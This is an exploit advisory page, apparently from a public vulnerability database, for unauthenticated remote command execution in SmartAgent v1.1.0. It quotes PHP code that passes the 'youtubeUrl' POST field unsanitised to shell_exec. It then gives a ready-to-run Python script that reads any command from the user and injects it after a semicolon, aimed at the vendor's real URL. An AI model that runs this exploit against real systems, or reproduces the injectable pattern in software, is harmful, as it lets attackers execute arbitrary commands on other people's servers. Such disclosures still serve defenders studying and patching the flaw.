SmartAgent 1.1.0 Remote Code Execution

2024.11.02
Credit: Alter Prime
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution # Date: 01-10-2024 # Exploit Author: Alter Prime # Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com # Version: Build v1.1.0 # Tested on: Kali Linux An unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered. Vulnerable code snippet from youtubeInfo.php: """ $youtubeUrl=$_POST["youtubeUrl"]; $command = 'youtube-dl -j ' . $youtubeUrl; echo shell_exec($command); """ Steps To Reproduce: 1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0 #Python Exploit import requests url = "https://smarts-srlcom.com?youtubeInfo.php" command = input("Enter the command you want to run \(EX: id\): ") postdata = { "youtubeUrl": ";" + command } response = requests.post(url, data=postdata, verify=False) print(response.text)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top